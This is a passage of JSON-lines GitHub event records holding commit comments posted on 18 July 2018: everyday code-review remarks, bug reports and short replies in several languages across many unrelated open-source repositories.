{"id":"7982889179","type":"CommitCommentEvent","actor":{"login":"GeoffreyMetais"},"repo":{"name":"kazemihabib/vlc-android"},"payload":{"comment":{"id":29749516,"position":32,"line":32,"path":"vlc-android/src/org/videolan/vlc/repository/ExternalSubRepository.kt","commit_id":"cb2d49463f65800b5764c79df98099d9e0e0eb3b","created_at":"2018-07-18T13:16:59Z","updated_at":"2018-07-18T13:16:59Z","author_association":"CONTRIBUTOR","body":"hungarian notation is not recommended in Kotlin, prefer `externalSubDao` directly"}},"created_at":"2018-07-18T13:16:59Z"}
{"id":"7982890288","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29749522,"position":5,"line":181,"path":"examples/simulation.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T13:17:09Z","updated_at":"2018-07-18T13:17:09Z","author_association":"CONTRIBUTOR","body":"Yes, that seems to be a good compromise solution. I can do it and you can then tell me what you think."}},"created_at":"2018-07-18T13:17:09Z"}
{"id":"7982891205","type":"CommitCommentEvent","actor":{"login":"Bbowen100"},"repo":{"name":"azemcetiner/mommymonitor"},"payload":{"comment":{"id":29749527,"position":18,"line":19,"path":"MM_App/src/Reducers/QuestionnaireReducer.js","commit_id":"b67ee9797df1fc3bb80e6415c72489b2a0fffbba","created_at":"2018-07-18T13:17:19Z","updated_at":"2018-07-18T13:17:19Z","author_association":"COLLABORATOR","body":"if Math.floor(Math.random() * allQuestions.length) returns the same integer then we will be adding the same question to the questions array multiple times. I would recommend using a set to determine uniqueness of the indexes."}},"created_at":"2018-07-18T13:17:19Z"}
{"id":"7982892759","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.09"},"payload":{"comment":{"id":29749534,"position":54,"line":62,"path":"SortingAlgorithms/SortJaggedArray.cs","commit_id":"1b3b9c884a955f6bef22bb7a2ff86b357d1f3fe3","created_at":"2018-07-18T13:17:33Z","updated_at":"2018-07-18T13:17:33Z","author_association":"NONE","body":"нет проверки IComparer на null"}},"created_at":"2018-07-18T13:17:33Z"}
{"id":"7982898938","type":"CommitCommentEvent","actor":{"login":"kof"},"repo":{"name":"gomesalexandre/react-jss"},"payload":{"comment":{"id":29749539,"position":6,"line":9,"path":"src/jss.js","commit_id":"ef4819ae8caf6bef41e72fd41f2695defcd4853c","created_at":"2018-07-18T13:18:33Z","updated_at":"2018-07-18T13:18:33Z","author_association":"NONE","body":"https://github.com/cssinjs/jss/issues/777"}},"created_at":"2018-07-18T13:18:33Z"}
{"id":"7982900150","type":"CommitCommentEvent","actor":{"login":"GeoffreyMetais"},"repo":{"name":"kazemihabib/vlc-android"},"payload":{"comment":{"id":29749544,"position":28,"line":28,"path":"vlc-android/src/org/videolan/vlc/database/models/NetworkFav.kt","commit_id":"cb2d49463f65800b5764c79df98099d9e0e0eb3b","created_at":"2018-07-18T13:18:45Z","updated_at":"2018-07-18T13:18:45Z","author_association":"CONTRIBUTOR","body":"Could you change for `BrowserFavs` and a a `type` parameter, which would be a Int.\r\nWe could use it for local browser too, and differienciate them with type_network or type_local"}},"created_at":"2018-07-18T13:18:45Z"}
{"id":"7982900180","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"CuongVnZ/XAntilagg"},"payload":{"comment":{"id":29749545,"position":null,"line":null,"path":null,"commit_id":"da180d2e935e9b2c2e7888fcaf785f735e650770","created_at":"2018-07-18T13:18:45Z","updated_at":"2018-07-18T13:18:45Z","author_association":"NONE","body":"Dear @CuongVnZ:\nI regret to inform you that the release you submitted, named \"**RPAntiLagg**\" (v1.1), for the project [XAntilagg](https://poggit.pmmp.io/ci/CuongVnZ/XAntilagg/XAntilagg) on 2018-07-04T13:24:02.000Z, has been rejected.\n\nThe default messages must be in English. You may put other languages, but the default must be English.\n\n> Disclaimer: Before you start complaining, just remember I am not a native English speaker either.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-18T13:18:45Z"}
{"id":"7982902982","type":"CommitCommentEvent","actor":{"login":"purerosefallen"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29749550,"position":null,"line":null,"path":null,"commit_id":"dff6d024e9f6dbf5fb58425064b9d7c04d6851ac","created_at":"2018-07-18T13:19:16Z","updated_at":"2018-07-18T13:19:16Z","author_association":"COLLABORATOR","body":"Why not directly skipping the bad param?\r\nIn addition, it may be better to allow group params, merging all the groups in here."}},"created_at":"2018-07-18T13:19:16Z"}
{"id":"7982913308","type":"CommitCommentEvent","actor":{"login":"alteredco"},"repo":{"name":"alteredco/mcc_github_thirty"},"payload":{"comment":{"id":29749568,"position":null,"line":null,"path":null,"commit_id":"fdca536d75aceb7db4a563971ed5bd6beb1fc6e9","created_at":"2018-07-18T13:21:00Z","updated_at":"2018-07-18T13:21:00Z","author_association":"OWNER","body":"Should have submitted pull request first! sorry! I thought I was only committing to my branch but it seemed to commit to master (T_T)"}},"created_at":"2018-07-18T13:21:00Z"}
{"id":"7982919474","type":"CommitCommentEvent","actor":{"login":"alteredco"},"repo":{"name":"alteredco/mcc_github_thirty"},"payload":{"comment":{"id":29749584,"position":null,"line":null,"path":null,"commit_id":"fdca536d75aceb7db4a563971ed5bd6beb1fc6e9","created_at":"2018-07-18T13:21:59Z","updated_at":"2018-07-18T13:21:59Z","author_association":"OWNER","body":"Anyhow, still need to fix the answer options in the buttons. Currently they all mount up as you click along!"}},"created_at":"2018-07-18T13:21:59Z"}
{"id":"7982919797","type":"CommitCommentEvent","actor":{"login":"xchs"},"repo":{"name":"contao/calendar-bundle"},"payload":{"comment":{"id":29749585,"position":18,"line":41,"path":"src/EventListener/PreviewUrlConvertListener.php","commit_id":"4b220c5d398bebe0bd0c2a0560caf1082ba7d064","created_at":"2018-07-18T13:22:02Z","updated_at":"2018-07-18T13:22:02Z","author_association":"CONTRIBUTOR","body":"Typo: \"… the the …\""}},"created_at":"2018-07-18T13:22:02Z"}
{"id":"7982927939","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"Igalia/webkit"},"payload":{"comment":{"id":29749598,"position":4,"line":1214,"path":"Source/JavaScriptCore/runtime/CommonSlowPaths.cpp","commit_id":"3f94d2f1395f97cf914febbf21d7d81068bd6826","created_at":"2018-07-18T13:23:17Z","updated_at":"2018-07-18T13:23:17Z","author_association":"MEMBER","body":"oh shit, we don't want this :)"}},"created_at":"2018-07-18T13:23:17Z"}
{"id":"7982966203","type":"CommitCommentEvent","actor":{"login":"s-zanella"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29749659,"position":null,"line":null,"path":null,"commit_id":"79de0e9a9a0da076275d041e8b8800e1b69f756f","created_at":"2018-07-18T13:29:22Z","updated_at":"2018-07-18T13:29:22Z","author_association":"CONTRIBUTOR","body":"Hi Karthik,\r\n\r\nThanks for the explanation. That clarified that the motivation for interfaces in `Lib` is not abstraction, which wasn't clear to me. I understand the two purposes you mention and can't really argue against (2) since the benefits are obvious. I don't buy (1) though. Have you encountered any situtations in which you can't get the same minimal verification context using `#reset-options \"--using_facts_from '* -FStar.*  +FStar.Pervasives'\"? If yes, then that's probably a bug in `--using_facts_from` that can be fixed. It may make a difference for normalization, but it shouldn't make any difference for Z3 queries.\r\n\r\nAnyway, since this is the style you adopted in Hacl, I'm willing to work with it for our post-quantum crypto work, I don't have any foundational objection. We started implementing `Lib.Buffer` on top of `LowStar.Buffer` in the `pqcrypto` branch.  I don't foresee any difficulties in completing it.\r\n"}},"created_at":"2018-07-18T13:29:22Z"}
{"id":"7982971113","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanTrashchenko/NET.S.2018.Trashchenko.09"},"payload":{"comment":{"id":29749669,"position":null,"line":null,"path":null,"commit_id":"f0f797afe91bf661f8e2b4a220eaad48da571b23","created_at":"2018-07-18T13:30:12Z","updated_at":"2018-07-18T13:30:12Z","author_association":"NONE","body":"Внешний цикл - не очень эффективный вариант этой сортировки."}},"created_at":"2018-07-18T13:30:12Z"}
{"id":"7982971643","type":"CommitCommentEvent","actor":{"login":"PinkaLulan"},"repo":{"name":"PinkaLulan/ShinColle"},"payload":{"comment":{"id":29749671,"position":null,"line":null,"path":null,"commit_id":"3843c900cff81c0d5b524f223613d4a64bfd015f","created_at":"2018-07-18T13:30:16Z","updated_at":"2018-07-18T13:30:16Z","author_association":"OWNER","body":"*particle helper not handler"}},"created_at":"2018-07-18T13:30:16Z"}
{"id":"7982972428","type":"CommitCommentEvent","actor":{"login":"rdp"},"repo":{"name":"rdp/ffmpeg-windows-build-helpers"},"payload":{"comment":{"id":29749676,"position":65,"line":1706,"path":"cross_compile_ffmpeg.sh","commit_id":"f4b204b98084c02ec98689c178c462a4bed07600","created_at":"2018-07-18T13:30:23Z","updated_at":"2018-07-18T13:30:23Z","author_association":"OWNER","body":"good catch!"}},"created_at":"2018-07-18T13:30:23Z"}
{"id":"7982975641","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29749681,"position":11,"line":11,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T13:30:56Z","updated_at":"2018-07-18T13:30:56Z","author_association":"OWNER","body":"var soma = 15 + 8"}},"created_at":"2018-07-18T13:30:56Z"}
{"id":"7982980476","type":"CommitCommentEvent","actor":{"login":"pratapvardhan"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29749687,"position":99,"line":205,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T13:31:44Z","updated_at":"2018-07-18T13:31:44Z","author_association":"NONE","body":"@naveenreddymanukonda -- Could you update the docstring with sample data (2 row and few columns) and expected output?"}},"created_at":"2018-07-18T13:31:44Z"}
{"id":"7982982207","type":"CommitCommentEvent","actor":{"login":"jarrodscott"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29749690,"position":null,"line":null,"path":null,"commit_id":"7153a9521f0ccf4db690c3060d36e2571481428b","created_at":"2018-07-18T13:32:01Z","updated_at":"2018-07-18T13:32:01Z","author_association":"CONTRIBUTOR","body":"Hi @ShaiberAlon \r\n\r\njust an FYI one thing that I found out after writing this FAQ about restating a failed job was that one  must run the full command with the `--unlock` flag first and then run the command without this flag before the workflow will continue. It looks like one can add a `--nolock` flag to avoid this but I did not want to confuse the issue and figured it would be better to tell you directly. \r\n\r\nhttps://snakemake.readthedocs.io/en/stable/project_info/faq.html#how-does-snakemake-lock-the-working-directory"}},"created_at":"2018-07-18T13:32:01Z"}
{"id":"7982983450","type":"CommitCommentEvent","actor":{"login":"phstc"},"repo":{"name":"phstc/putslabel"},"payload":{"comment":{"id":29749695,"position":null,"line":null,"path":null,"commit_id":"a0d5a7f01d84bea9cb83ddb6c745d7d88fd3d3d3","created_at":"2018-07-18T13:32:13Z","updated_at":"2018-07-18T13:32:13Z","author_association":"OWNER","body":"@ponyesteves 🙏 "}},"created_at":"2018-07-18T13:32:13Z"}
{"id":"7982984140","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29749696,"position":null,"line":null,"path":null,"commit_id":"d61275c291aa3fd0540293d7e01a6372e2d4923a","created_at":"2018-07-18T13:32:20Z","updated_at":"2018-07-18T13:32:20Z","author_association":"COLLABORATOR","body":"@rama64 lo de los cascade=\"all\" es porque si se borra el Cliente se borran los Votos y las Recomendaciones. Lo único que no se borran son los comentarios que eso salió de la charla con el cliente que deben quedar en el sistema."}},"created_at":"2018-07-18T13:32:20Z"}
{"id":"7982991399","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/gn_module_suivi_flore_territoire"},"payload":{"comment":{"id":29749707,"position":11,"line":98,"path":"data/suivi_territoire.sql","commit_id":"f616ac4b0e3003e915b7c0f4645b51a541a1d9a5","created_at":"2018-07-18T13:33:32Z","updated_at":"2018-07-18T13:33:32Z","author_association":"MEMBER","body":"Reste un ID_type en dur ici ?"}},"created_at":"2018-07-18T13:33:32Z"}
{"id":"7982993391","type":"CommitCommentEvent","actor":{"login":"n18022"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29749712,"position":null,"line":null,"path":null,"commit_id":"5cea385cf50c2c1ff40aea01362b600191a200e4","created_at":"2018-07-18T13:33:51Z","updated_at":"2018-07-18T13:33:51Z","author_association":"OWNER","body":"そうですね！\\n入れてみます！\r\n\r\n2018年7月18日 13:07 kinjo-icolle <notifications@github.com>:\r\n\r\n> 結果OKです。死ねって。。。笑\r\n> コードの部分ですが、ただ動くだけでなく、改行を適宜入れると、第三者にとっても読みやすくなると思います。\r\n>\r\n> importとリストの定義、リストの定義と乱数の取得、乱数の取得と結果表示の間あたりにそれぞれ空行を入れると良いかと。\r\n> 小説で段落ごとに空行があるとひと呼吸置けて読みやすいような、そんなイメージです。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18022/programming-term2/commit/5cea385cf50c2c1ff40aea01362b600191a200e4#commitcomment-29743765>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Aldxpe7Lf6GK56LBbJ5GlaextTJvIdftks5uHrSVgaJpZM4VT6dP>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-18T13:33:51Z"}
{"id":"7982995029","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29749723,"position":5,"line":181,"path":"examples/simulation.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T13:34:09Z","updated_at":"2018-07-18T13:34:09Z","author_association":"CONTRIBUTOR","body":"Yes, they will: They don't have to excplicitly import (or even know about) `DistAlgorithm` to use e.g. `Step<Agreement>`."}},"created_at":"2018-07-18T13:34:09Z"}
{"id":"7982995767","type":"CommitCommentEvent","actor":{"login":"fabiosantoscode"},"repo":{"name":"fabiosantoscode/terser"},"payload":{"comment":{"id":29749725,"position":null,"line":null,"path":null,"commit_id":"68435eba3dbc14a2ff031544a627e6bc219edc5f","created_at":"2018-07-18T13:34:16Z","updated_at":"2018-07-18T13:34:16Z","author_association":"OWNER","body":"Looks good :)"}},"created_at":"2018-07-18T13:34:16Z"}
{"id":"7982996323","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29749726,"position":14,"line":14,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T13:34:21Z","updated_at":"2018-07-18T13:34:21Z","author_association":"OWNER","body":"soma++"}},"created_at":"2018-07-18T13:34:21Z"}
{"id":"7982998972","type":"CommitCommentEvent","actor":{"login":"itsandreramon"},"repo":{"name":"itsandreramon/Personal-Website"},"payload":{"comment":{"id":29749730,"position":null,"line":null,"path":null,"commit_id":"ab9678d295f0c1575bf854c23bb6475e0af2c265","created_at":"2018-07-18T13:34:49Z","updated_at":"2018-07-18T13:34:49Z","author_association":"OWNER","body":"*Overwrite"}},"created_at":"2018-07-18T13:34:49Z"}
{"id":"7982999271","type":"CommitCommentEvent","actor":{"login":"life"},"repo":{"name":"Adenaser/test-123"},"payload":{"comment":{"id":29749731,"position":null,"line":null,"path":null,"commit_id":"3df7e2a607d2b3baee7880e874c26998c68ae067","created_at":"2018-07-18T13:34:51Z","updated_at":"2018-07-18T13:34:51Z","author_association":"NONE","body":"yeap"}},"created_at":"2018-07-18T13:34:51Z"}
{"id":"7983000611","type":"CommitCommentEvent","actor":{"login":"n18022"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29749733,"position":null,"line":null,"path":null,"commit_id":"b35d0b903e3d8229a77d296504c384cb43438734","created_at":"2018-07-18T13:35:06Z","updated_at":"2018-07-18T13:35:06Z","author_association":"OWNER","body":"先生のコード確認します。ありがとうございます！\r\n\r\n2018年7月17日 21:26 kinjo-icolle <notifications@github.com>:\r\n\r\n> 修正結果確認しました。\r\n> 動作結果嬢は問題ないですが、結局2重ループが意味をなしてないですね^^;\r\n> 5行目のフープが1回しか回らないので、ちょっと求めてた答えと違う気がします。\r\n> 僕のコードなり、ちょっと参考にしてみてくださいね。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18022/programming-term2/commit/b35d0b903e3d8229a77d296504c384cb43438734#commitcomment-29734000>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AldxpdysQqWTdr9Ud8VW2dFNYEFLEGiCks5uHdgQgaJpZM4VSwCc>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-18T13:35:06Z"}
{"id":"7983002110","type":"CommitCommentEvent","actor":{"login":"syniox"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29749734,"position":null,"line":null,"path":null,"commit_id":"7dddbffdf73d3ccc90137d63d7ce8d756d0cbb8d","created_at":"2018-07-18T13:35:20Z","updated_at":"2018-07-18T13:35:20Z","author_association":"OWNER","body":"老是滥用nxi()。。"}},"created_at":"2018-07-18T13:35:20Z"}
{"id":"7983005889","type":"CommitCommentEvent","actor":{"login":"troizky"},"repo":{"name":"ros-planning/moveit"},"payload":{"comment":{"id":29749744,"position":138,"line":512,"path":"moveit_core/collision_detection_fcl/src/collision_common.cpp","commit_id":"f235eac6d4004c3990a5edaad892076f96fd6e77","created_at":"2018-07-18T13:35:58Z","updated_at":"2018-07-18T13:35:58Z","author_association":"NONE","body":"Better use method CollisionGeometryData::getID() to avoid incorrect object access in case of AttachedBody."}},"created_at":"2018-07-18T13:35:58Z"}
{"id":"7983008506","type":"CommitCommentEvent","actor":{"login":"desphilboy"},"repo":{"name":"desphilboy/SVG-cards"},"payload":{"comment":{"id":29749752,"position":null,"line":null,"path":null,"commit_id":"0e74e8afc24b3c2a55157489ededd7c01400964c","created_at":"2018-07-18T13:36:24Z","updated_at":"2018-07-18T13:36:24Z","author_association":"OWNER","body":"@htdebeer \r\nHi, I updated the npm package.  what is your usernme at npm ? I can send you an invite to manage the package"}},"created_at":"2018-07-18T13:36:24Z"}
{"id":"7983011638","type":"CommitCommentEvent","actor":{"login":"OJWatson"},"repo":{"name":"OJWatson/rdhs"},"payload":{"comment":{"id":29749758,"position":13,"line":280,"path":"R/read_dhs_dta.R","commit_id":"5e7c8138f9fca50fd73361f440e300143cd30e71","created_at":"2018-07-18T13:36:55Z","updated_at":"2018-07-18T13:36:55Z","author_association":"OWNER","body":"This causes a new bug. Example file \"AOBR62DT.ZIP\"\r\nError occurs within .parse_labels with the following error:\r\n```\r\nError in nchar(x) : invalid multibyte string, element 4\r\n```"}},"created_at":"2018-07-18T13:36:55Z"}
{"id":"7983012409","type":"CommitCommentEvent","actor":{"login":"ponyesteves"},"repo":{"name":"phstc/putslabel"},"payload":{"comment":{"id":29749762,"position":null,"line":null,"path":null,"commit_id":"a0d5a7f01d84bea9cb83ddb6c745d7d88fd3d3d3","created_at":"2018-07-18T13:37:02Z","updated_at":"2018-07-18T13:37:02Z","author_association":"NONE","body":"@phstc quedó ??? :+1:\n\nEl mié., 18 jul. 2018 10:32, Pablo Cantero <notifications@github.com>\nescribió:\n\n> @ponyesteves <https://github.com/ponyesteves> 🙏\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/phstc/putslabel/commit/a0d5a7f01d84bea9cb83ddb6c745d7d88fd3d3d3#commitcomment-29749695>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEuxTSD6e-izaysOj5zehucf4WfxwfFjks5uHzjdgaJpZM4VUmyo>\n> .\n>\n"}},"created_at":"2018-07-18T13:37:02Z"}
{"id":"7983013464","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29749769,"position":17,"line":17,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T13:37:14Z","updated_at":"2018-07-18T13:37:14Z","author_association":"OWNER","body":"soma  *= 3"}},"created_at":"2018-07-18T13:37:14Z"}
{"id":"7983014212","type":"CommitCommentEvent","actor":{"login":"RafaelFelipe"},"repo":{"name":"RafaelFelipe/CG-2018"},"payload":{"comment":{"id":29749773,"position":null,"line":null,"path":null,"commit_id":"c9614be6a2928f5062d4c304b79a49bba2cb7938","created_at":"2018-07-18T13:37:22Z","updated_at":"2018-07-18T13:37:22Z","author_association":"OWNER","body":"Exclusão do objeto pumba"}},"created_at":"2018-07-18T13:37:22Z"}
{"id":"7983019246","type":"CommitCommentEvent","actor":{"login":"JonasWeismueller"},"repo":{"name":"Azure/azure-sdk-for-python"},"payload":{"comment":{"id":29749791,"position":null,"line":null,"path":null,"commit_id":"0489ff9345f8d8f74cd15ec6406a66de6885aff4","created_at":"2018-07-18T13:38:13Z","updated_at":"2018-07-18T13:38:13Z","author_association":"NONE","body":"When is the next release planned? It would be great to get those fixes with a bunch of others as well.\r\nLast release is almost one year ago: 3.0.1 (2017-09-26)"}},"created_at":"2018-07-18T13:38:13Z"}
{"id":"7983024492","type":"CommitCommentEvent","actor":{"login":"ksooo"},"repo":{"name":"palinek/pvr.sledovanitv.cz"},"payload":{"comment":{"id":29749805,"position":null,"line":null,"path":null,"commit_id":"0f46e1e9703ff9f3ebbe46a0042c51e626f052b8","created_at":"2018-07-18T13:39:06Z","updated_at":"2018-07-18T13:39:06Z","author_association":"NONE","body":"> Version increase done. I'll remember that.\r\n\r\n Cool, thanks."}},"created_at":"2018-07-18T13:39:06Z"}
{"id":"7983024762","type":"CommitCommentEvent","actor":{"login":"waddlesplash"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29749806,"position":null,"line":null,"path":null,"commit_id":"a073b38c27d6e111313a1fec3ae4659e55cc27d5","created_at":"2018-07-18T13:39:08Z","updated_at":"2018-07-18T13:39:08Z","author_association":"MEMBER","body":"This belongs in the wiki, not here. Please revert and move to there."}},"created_at":"2018-07-18T13:39:08Z"}
{"id":"7983025890","type":"CommitCommentEvent","actor":{"login":"Wolfkid200444"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29749810,"position":null,"line":null,"path":null,"commit_id":"6507bb8647253a527b4b43a03b5ec815b4904696","created_at":"2018-07-18T13:39:19Z","updated_at":"2018-07-18T13:39:19Z","author_association":"NONE","body":"Put Less Particles"}},"created_at":"2018-07-18T13:39:19Z"}
{"id":"7983028065","type":"CommitCommentEvent","actor":{"login":"littledan"},"repo":{"name":"pipobscure/proposal-temporal"},"payload":{"comment":{"id":29749813,"position":null,"line":null,"path":null,"commit_id":"d3637037eb6af4b1b99b1c9b376ec24eae71a3f2","created_at":"2018-07-18T13:39:41Z","updated_at":"2018-07-18T13:39:41Z","author_association":"NONE","body":"+1"}},"created_at":"2018-07-18T13:39:41Z"}
{"id":"7983028963","type":"CommitCommentEvent","actor":{"login":"Wolfkid200444"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29749817,"position":null,"line":null,"path":null,"commit_id":"6507bb8647253a527b4b43a03b5ec815b4904696","created_at":"2018-07-18T13:39:51Z","updated_at":"2018-07-18T13:39:51Z","author_association":"NONE","body":"Add Configs.yml file so we can configs the stuff"}},"created_at":"2018-07-18T13:39:51Z"}
{"id":"7983035446","type":"CommitCommentEvent","actor":{"login":"ksooo"},"repo":{"name":"palinek/pvr.sledovanitv.cz"},"payload":{"comment":{"id":29749831,"position":null,"line":null,"path":null,"commit_id":"0f46e1e9703ff9f3ebbe46a0042c51e626f052b8","created_at":"2018-07-18T13:40:56Z","updated_at":"2018-07-18T13:40:56Z","author_association":"NONE","body":"You might want me to give write access to your repo. Then, I can commit trivial (non-functional) changes myself."}},"created_at":"2018-07-18T13:40:56Z"}
{"id":"7983035974","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29749836,"position":22,"line":22,"path":"posts/Guillaume/2018-07-18-hibernate-validator-6011-final-out.adoc","commit_id":"5dbd1fb006b89fdd608772615b48f51ca255bf61","created_at":"2018-07-18T13:41:01Z","updated_at":"2018-07-18T13:41:01Z","author_association":"MEMBER","body":"\"except OSGi tests for which we are waiting for a Karaf update\" would be clearer, in my opinion."}},"created_at":"2018-07-18T13:41:01Z"}
{"id":"7983038500","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29749838,"position":38,"line":38,"path":"posts/Guillaume/2018-07-18-hibernate-validator-6011-final-out.adoc","commit_id":"5dbd1fb006b89fdd608772615b48f51ca255bf61","created_at":"2018-07-18T13:41:27Z","updated_at":"2018-07-18T13:41:27Z","author_association":"MEMBER","body":"Shouldn't the patches be for WF 12 and 13? Or even 13 and 14?"}},"created_at":"2018-07-18T13:41:27Z"}
{"id":"7983049380","type":"CommitCommentEvent","actor":{"login":"diogos84"},"repo":{"name":"diogos84/github-master"},"payload":{"comment":{"id":29749856,"position":null,"line":null,"path":null,"commit_id":"01db1e126be78913b8b0a596d0e5718696a04ea8","created_at":"2018-07-18T13:43:12Z","updated_at":"2018-07-18T13:43:12Z","author_association":"OWNER","body":"Alterar mensagem"}},"created_at":"2018-07-18T13:43:12Z"}
{"id":"7983049607","type":"CommitCommentEvent","actor":{"login":"diogos84"},"repo":{"name":"diogos84/github-master"},"payload":{"comment":{"id":29749857,"position":10,"line":10,"path":"contato.html","commit_id":"01db1e126be78913b8b0a596d0e5718696a04ea8","created_at":"2018-07-18T13:43:14Z","updated_at":"2018-07-18T13:43:14Z","author_association":"OWNER","body":"Aqui deveria ser Pagina de Contato do Site"}},"created_at":"2018-07-18T13:43:14Z"}
{"id":"7983053111","type":"CommitCommentEvent","actor":{"login":"SeonghwanKim13109"},"repo":{"name":"SeonghwanKim13109/doit"},"payload":{"comment":{"id":29749870,"position":null,"line":null,"path":null,"commit_id":"422c10503349c724eca93becd4d56bbcd2782b23","created_at":"2018-07-18T13:43:48Z","updated_at":"2018-07-18T13:43:48Z","author_association":"OWNER","body":"구구단"}},"created_at":"2018-07-18T13:43:48Z"}
{"id":"7983053182","type":"CommitCommentEvent","actor":{"login":"MadFaill"},"repo":{"name":"MadFaill/gods"},"payload":{"comment":{"id":29749871,"position":null,"line":null,"path":null,"commit_id":"bbaf5d1c5709bd847633f020e0dd3b39d9a575b5","created_at":"2018-07-18T13:43:48Z","updated_at":"2018-07-18T13:43:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Сетап инструментария для delivery/discovery](https://trello.com/c/oJ4EKkdX/6-%D1%81%D0%B5%D1%82%D0%B0%D0%BF-%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%D0%B0%D1%80%D0%B8%D1%8F-%D0%B4%D0%BB%D1%8F-delivery-discovery)"}},"created_at":"2018-07-18T13:43:48Z"}
{"id":"7983057184","type":"CommitCommentEvent","actor":{"login":"francois-sissoko"},"repo":{"name":"francois-sissoko/hackingtools"},"payload":{"comment":{"id":29749877,"position":null,"line":null,"path":null,"commit_id":"46441e6dcbc8ed00f5f30118308b9f54694824fc","created_at":"2018-07-18T13:44:25Z","updated_at":"2018-07-18T13:44:25Z","author_association":"OWNER","body":"Simple Encryption where you are just reversing the order of the string"}},"created_at":"2018-07-18T13:44:25Z"}
{"id":"7983057543","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29749878,"position":5,"line":181,"path":"examples/simulation.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T13:44:29Z","updated_at":"2018-07-18T13:44:29Z","author_association":"CONTRIBUTOR","body":"I'm not sure if that would be OK for internal uses of step where we vary types a bit without having a dedicated `DistAlgorithm`:\r\nhttps://github.com/poanetwork/hbbft/blob/2d9b872484f858f67637f8802bd0edafe242f195/src/dynamic_honey_badger/mod.rs#L274\r\n\r\nI've added a proposed typedef solution just in case for your reference."}},"created_at":"2018-07-18T13:44:29Z"}
{"id":"7983064409","type":"CommitCommentEvent","actor":{"login":"prosecco"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29749892,"position":null,"line":null,"path":null,"commit_id":"79de0e9a9a0da076275d041e8b8800e1b69f756f","created_at":"2018-07-18T13:45:33Z","updated_at":"2018-07-18T13:45:33Z","author_association":"CONTRIBUTOR","body":"> Thanks for the explanation. That clarified that the motivation for interfaces in Lib is not abstraction, which wasn't clear to me. I understand the two purposes you mention and can't really argue against (2) since the benefits are obvious. I don't buy (1) though. Have you encountered any situtations in which you can't get the same minimal verification context using #reset-options \"--using_facts_from '* -FStar.* +FStar.Pervasives'\"? If yes, then that's probably a bug in--using_facts_from` that can be fixed. It may make a difference for normalization, but it shouldn't make any difference for Z3 queries\n> \nI have only minimally experimented with —using_facts_from and maybe you can help find a better way for doing this.\nFrom what I understand, if we expose FStar.Seq in Lib.Seq, then by default all definitions and lemmas from FStar.Seq get added to the context.\nSo that a module M that uses Lib.Seq would also have these definitions and lemmas in the context.\nBy relying on “—using_facts_from” in M, we’d be able to restrict the context when type checking M, but we would need to add this 